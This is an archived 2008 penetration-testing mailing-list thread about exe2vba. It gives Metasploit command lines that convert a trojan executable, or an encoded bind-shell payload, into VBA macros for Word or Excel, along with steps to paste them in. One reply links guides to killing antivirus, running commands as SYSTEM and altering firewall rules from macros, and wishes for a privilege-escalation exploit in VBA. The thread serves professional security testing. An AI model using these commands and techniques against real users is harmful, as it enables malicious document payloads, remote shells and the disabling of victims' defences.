Penetration Testing mailing list archives
Re: Exe2vba - Anybody still have this?
From: natron <natron () invisibledenizen org>
Date: Sun, 16 Nov 2008 20:50:17 -0600
I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights. If anyone would find them useful: Running commands or launching programs: http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html Downloading files and saving them to disk: http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html Running commands as SYSTEM: http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html Killing off any antivirus that may be running: http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html Modifying the Windows Firewall: http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges. -n On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist () digitaloffense net> wrote:
Hi Joseph, I added this to Metasploit. You can use the VBA generator in a few different ways: 1) Convert an EXE to a VBA script (works on Word/Excel automatically): $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba 2) Create a VBA script that runs a Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba 3) Create a VBA script that runs an encoded Metasploit payload $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \ ruby msf3/msfencode -a x86 -b '' -t vba > output.vba To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-) You need the latest SVN of Metasploit 3.2 trunk: $ svn co http://metasploit.com/svn/framework3/trunk/ On Windows, follow this guide: - http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN -HD On Tuesday 11 November 2008, Joseph McCray wrote:It used to be located at: http://www.priestmaster.org/tools.html I've been looking all over the web and really haven't been able to find this app anymore.------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Cenzic Security Trends Report from Cenzic Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now www.cenzic.com/landing/trends-report ------------------------------------------------------------------------
Current thread:
- Exe2vba - Anybody still have this? Joseph McCray (Nov 11)
- Re: Exe2vba - Anybody still have this? Lucas Lyon (Nov 12)
- Re: Exe2vba - Anybody still have this? H D Moore (Nov 12)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- RE: Exe2vba - Anybody still have this? Brett Moore (Nov 17)
- Re: Exe2vba - Anybody still have this? Ulisses Castro (thebug) (Nov 17)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- <Possible follow-ups>
- Re: Exe2vba - Anybody still have this? infolookup (Nov 12)